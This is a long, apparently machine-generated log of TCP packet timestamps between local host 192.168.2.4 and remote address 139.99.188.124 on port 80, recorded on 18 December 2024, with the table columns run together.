                                                                              Dec 18, 2024 21:00:29.589307070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.589473963 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.590406895 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.590462923 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.591367960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.591381073 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.591559887 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.593188047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.593202114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.593261957 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.595026016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.595942020 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.596184015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.596885920 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.596898079 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.597059965 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.598723888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.598736048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.598810911 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.600550890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.609342098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.609549999 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.609761953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.610717058 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.610908985 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.611651897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612576008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612588882 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.612763882 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.614444017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.614459038 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.614556074 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.616417885 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.616430998 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.616597891 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.618122101 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.618140936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.618644953 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.619992018 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.620007992 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.620075941 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.621830940 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.621845961 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.621917963 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.623632908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.623656034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.624030113 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.625742912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.625763893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.625813007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.627901077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.627916098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.627975941 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.629877090 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.629893064 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.629944086 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.631949902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.631963968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.631974936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.632252932 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.632253885 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.633929014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.633951902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.634038925 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.636181116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.636194944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.636241913 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.638073921 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638088942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638099909 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.638561964 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.640145063 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.640160084 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.641809940 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.642128944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642148972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642162085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.642210007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.642210007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.644195080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.644222021 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.644377947 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.646230936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.646243095 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.647279978 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.647763968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.647789001 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.648436069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.649599075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.649611950 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.649713993 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.651407003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651422977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651437998 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.651485920 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.653214931 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.653264046 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.653323889 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.654920101 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.654947996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.654983044 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.656686068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.656702042 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.656814098 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.658535004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658551931 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658564091 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.658620119 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.658654928 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.660279036 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.660301924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.660378933 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.662019014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.662075996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.662256002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.663801908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.663827896 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.664103985 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.665740013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.665756941 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.665811062 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.667442083 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.667462111 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.667475939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.667536974 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.669177055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.669190884 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.669234037 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.670939922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.670954943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.670974016 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.672703981 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.672719955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.672771931 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.674500942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.674515963 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.674637079 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.676280975 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.676295042 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.676306009 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.676346064 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.676369905 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.678075075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.678088903 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.678337097 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.679819107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.679841995 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.680110931 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.681622982 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.681634903 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.681678057 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.683413029 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.683428049 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.683445930 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.683490992 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.685157061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.685173035 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.685254097 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.686948061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.686960936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.687012911 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.794320107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.794787884 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.794797897 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.795762062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.795876026 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.796389103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.797071934 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.797084093 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.797384977 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.798459053 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.798943043 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.799218893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.800064087 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.800076008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.800992012 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.801827908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.801860094 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.802083015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.803627968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.803641081 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.804183960 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.806169987 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.806476116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.806710958 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.806724072 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.807363987 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.807501078 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.808324099 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.808335066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.808885098 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.809900045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.809984922 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.810729980 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.810741901 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.811347008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.812318087 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.813146114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.813158989 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.813388109 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.814773083 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.814784050 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.815347910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.816384077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.816395044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.816514969 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.817938089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.817950010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.819334030 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.819741011 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.819755077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.820657015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.821516037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.821527958 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.821654081 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.823295116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.823307037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.823406935 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.825050116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.825062990 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.825081110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.825196028 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.825196028 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.826833963 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.826860905 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.827068090 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.828656912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.828668118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.828676939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.829628944 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.830446005 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.830471039 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.830507994 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.832318068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.832329988 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.833043098 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.834008932 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.834021091 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.834033012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.834717035 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.834717035 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.835757971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.835769892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.837580919 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.837593079 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.837635994 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.837635994 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.840012074 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.840024948 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.840415955 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.841161013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.841172934 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.841182947 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.841238022 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.842890978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.842904091 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.842947960 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.847923040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.847939968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.847950935 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.847961903 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.847996950 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.848083019 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.848237991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.848261118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.848598957 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.851489067 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.851502895 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.851563931 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.851665020 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.851753950 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.853176117 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.853189945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.853250980 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.854816914 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.854829073 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.855082035 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.856682062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.856694937 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.856756926 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.857968092 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.857981920 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.857990980 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.858026981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.860301971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.860312939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.860409021 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.861869097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.861881971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.861980915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.864767075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.864779949 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.864835024 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.866457939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.866471052 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.866561890 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.868215084 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.868227005 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.868236065 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.868329048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.868329048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.870291948 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.870304108 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.870357037 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.871867895 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.871881008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.871939898 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.873617887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.873630047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.873697042 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.875359058 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.875371933 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.875381947 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.875454903 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.875606060 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.875650883 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.875685930 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.877352953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.877366066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.877607107 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.878530979 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.878551960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.878562927 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.878590107 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.878590107 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.986608028 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.986977100 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.987032890 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.987763882 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.987778902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.987915039 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.989336967 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.990169048 CET8049744139.99.188.124192.168.2.4
